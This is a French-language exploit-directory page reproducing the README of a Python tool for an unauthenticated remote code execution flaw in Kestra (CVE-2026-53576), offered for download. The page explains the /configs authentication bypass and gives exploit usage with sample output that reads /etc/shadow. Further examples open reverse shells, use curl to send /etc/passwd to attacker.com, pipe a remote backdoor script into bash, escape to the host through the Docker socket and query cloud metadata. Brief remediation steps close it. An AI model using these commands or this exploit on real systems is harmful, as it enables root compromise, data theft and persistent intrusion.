Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-53576 — Kestra Exploit RCE non authentifié (CVE-2026-53576) | Kitploit
Outils/GitHubGitHub/tamatahyt/cve-2026-53576
Authentification et AutorisationEscalade de PrivilègesExploitationExploitation d'Applications WebExfiltration de DonnéesPost-ExploitationTests d'IntrusionRed TeamingDéveloppement de Charges UtilesÉvasion de Conteneur
25il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
tamatahyt/cve-2026-53576

CVE-2026-53576

Kestra Exploit RCE non authentifié (CVE-2026-53576)

Voir le dépôt
Partager

Exploit RCE non authentifié Kestra (CVE-2026-53576)

Python License Security Kestra

Contournement critique de l'authentification menant à une exécution de code à distance non authentifiée

Exploit • Détails de la vulnérabilité • Impact • Remédiation


⚠️ AVERTISSEMENT

Cet outil est destiné uniquement à des fins de tests de sécurité éducatifs et autorisés.

  • NE PAS utiliser cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation écrite explicite de test.
  • NE PAS l'utiliser pour des activités illégales.
  • L'auteur n'est PAS responsable de toute mauvaise utilisation de cet outil.
  • À utiliser à vos PROPRES RISQUES.

📋 Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Utilisation de l'exploit
  • Installation
  • Exemples
  • Impact
  • Remédiation
  • Chronologie
  • Références
  • Licence

🔍 Aperçu

CVE-2026-53576 est une vulnérabilité critique dans les versions de Kestra OSS jusqu'à v1.3.20 qui permet une exécution de code à distance non authentifiée via un contournement du filtre d'authentification.

Détails clés

AttributValeur
Identifiant CVECVE-2026-53576
GravitéCritique (9.8 CVSS)
Type de vulnérabilitéContournement d'authentification + RCE
Produit concernéKestra OSS
Versions concernées≤ v1.3.20
Vecteur d'attaqueRéseau
Authentification requiseAucune
Interaction de l'utilisateurAucune

🚨 Détails de la vulnérabilité

Cause racine

Le filtre d'authentification de Kestra contient une faille logique critique :

// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

Cette vérification détermine si toute requête API se termine par /configs, au lieu de correspondre à la route exacte. Cela permet aux attaquants de contourner l'authentification en ajoutant /configs à n'importe quel point de terminaison.

Étapes d'exploitation

  1. Créer un flux malveillant → POST /api/v1/main/flows/configs (contourne l'authentification)
  2. Déclencher l'exécution → POST /api/v1/main/executions/configs/configs (contourne l'authentification)
  3. Les commandes s'exécutent en root → Compromission totale du système

Points de terminaison vulnérables

# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 Utilisation de l'exploit

Utilisation de base

python3 kestra_exploit.py <target_ip>

Utilisation avancée

# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

Options de commande

OptionDescription
targetAdresse IP ou nom d'hôte cible (obligatoire)
-p, --portPort (par défaut : 8080)
--httpsUtiliser HTTPS au lieu de HTTP
-c, --commandCommande personnalisée à exécuter
--docker-checkVérifier l'accès au socket Docker
--cleanupSupprimer le flux après l'exploitation
--delayDélai entre les requêtes (par défaut : 2s)

📦 Installation

Prérequis

pip install requests

Cloner le dépôt

git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

Vérifier l'installation

python3 kestra_exploit.py --help

🎯 Exemples

Exemple 1 : Exploitation de base

python3 kestra_exploit.py 192.168.1.100

Sortie :

============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

Exemple 2 : Shell inversé

python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Exemple 3 : Exfiltration de données

python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

Exemple 4 : Vérification d'évasion Docker

python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 Impact

Impact direct

CatégorieGravitéDescription
Confidentialité⚠️ CritiqueLire n'importe quel fichier (mots de passe, secrets, configurations)
Intégrité⚠️ CritiqueCréer/modifier/supprimer des flux et des données
Disponibilité⚠️ ÉlevéeArrêt du système, épuisement des ressources
Authentification⚠️ CritiqueContournement complet de Basic-Auth
Élévation de privilèges⚠️ CritiqueLes commandes s'exécutent en root (uid=0)
Évasion de conteneur⚠️ CritiqueCompromission de l'hôte via le socket Docker

Capacités d'attaque

Un attaquant non authentifié peut :

  1. Exécuter des commandes arbitraires en root :

    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. Pivoter vers le système hôte (si le socket Docker est monté) :

    docker run -v /:/host --privileged alpine chroot /host
    
  3. Accéder aux métadonnées cloud (si sur un fournisseur cloud) :

    curl http://169.254.169.254/latest/meta-data/
    

🛡️ Remédiation

Actions immédiates

  1. Arrêter les instances vulnérables :

    sudo systemctl stop kestra
    
  2. Bloquer l'accès public :

    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. Appliquer des règles de pare-feu :

    • Restreindre aux réseaux internes
    • Utiliser un VPN pour l'accès administratif

Correctif permanent

Télécharger l’outil